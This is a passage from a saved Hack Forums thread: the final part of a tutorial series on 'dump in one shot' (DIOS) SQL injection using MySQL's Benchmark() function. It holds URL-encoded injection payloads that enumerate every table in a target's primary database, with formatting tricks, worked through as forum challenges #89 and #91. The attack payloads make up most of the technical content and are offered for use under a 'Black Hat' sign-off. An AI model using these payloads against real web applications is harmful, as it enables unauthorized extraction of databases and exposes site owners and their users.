#7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">length</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">text</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">CONCAT<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(&nbsp;(@</span><span style="color: #66CCFF">i</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">i</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">2b1</span><span style="color: #7AC07C">)&gt;</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">concat<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x3c666f6e7420636f6c6f723d23</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">hex</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">crc32</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">rand</span><span style="color: #7AC07C">())),&nbsp;</span><span style="color: #66CCFF">0x3e</span><span style="color: #7AC07C">,&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">mid</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">text</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">i</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">1</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,&nbsp;@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00<br>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">)<br>&nbsp;)<br>))))</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">),&nbsp;<br></span></code></div></div></div><br>This time in local variable <span style="color: #FF1493;">@text</span> we assigned mentioned part <span style="color: #00BFFF;">LPAD(@running_number:=@running_number%2b1,2,0x30),0x2e20, table_name</span>.
 So numbering part with table name from each iteration is saved in local
 variable. From there later individual character is taken for coloring.<br><br>Benchmark will iterate coloring function <span style="color: #32CD32;">length(@text) times</span>
 (from first character in output to last character in output, where 
output in each iteration is number with table name from primary 
database).<br><br>And result of such code can be:<br><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/5d2189c8c77a008e9906c9bbf104e7de.jpg" alt="[Image: 5d2189c8c77a008e9906c9bbf104e7de.jpg]" border="0"><br><br><hr><br><span style="font-size: xx-large;"><span style="font-weight: bold;"><span style="color: #FFA500;">Challenge</span> <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4055451" target="_blank">#91</a></span></span></span><br><br>Main task in this challenge was:<ul><li>display
 numbered list of all tables in primary database where each next 
character in output is in different letter case (uppercase/lowercase)<br></li></ul>We can solve that challenge on the same way as challenge <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4032959" target="_blank">#89</a></span><br><br>In standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a> for displaying all tables in primary database we inserted <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank">benchmark based DIOS</a></span>:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,<br>@</span><span style="color: #66CCFF">i</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,<br>if(&nbsp;</span><span style="color: #66CCFF">Benchmark<br>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">length</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">),&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;IF(&nbsp;</span><span style="color: #66CCFF">MOD</span><span style="color: #7AC07C">((@</span><span style="color: #66CCFF">i</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">i</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">2b1</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">)=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(&nbsp;@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">upper</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">CONVERT</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">mid</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">i</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">1</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">USING&nbsp;latin1</span><span style="color: #7AC07C">))&nbsp;),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(&nbsp;@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">lower</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">CONVERT</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">mid</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">i</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">1</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">USING&nbsp;latin1</span><span style="color: #7AC07C">))&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;)=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x00<br>&nbsp;&nbsp;</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>In variable <span style="color: #FF1493;">@x</span> numbering part and table name from each iteration in standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a> is saved. In benchmark we iterated expression for lowercase/uppercase of each character <span style="color: #FFA500;">length(@x)</span> times (from first to last character stored in local variable <span style="color: #FF1493;">@x</span>)<br><br>We
 used function MOD() again. At each even position in string we changed 
character to uppercase and at each odd position to lowercase.<br><br>And final result was:<br><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/aecb13d7ddc542e0e0b392f7eab7f60e.jpg" alt="[Image: aecb13d7ddc542e0e0b392f7eab7f60e.jpg]" border="0"><br><br>As you see in this 5 parts tutorial <span style="color: #32CD32;">Benchmark()</span> can be a "monster" command. Use it wisely <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"> Your imagination is your only limit <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/oui.gif" style="vertical-align: middle;" alt="Oui" title="Oui" border="0"><br><br>Thanks for reading <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_39512133"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4174318&amp;replyto=39512133" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=4174318&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=4174318&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=4174318" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=4174318">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=4174318" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4174318&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-4174318.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%235%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->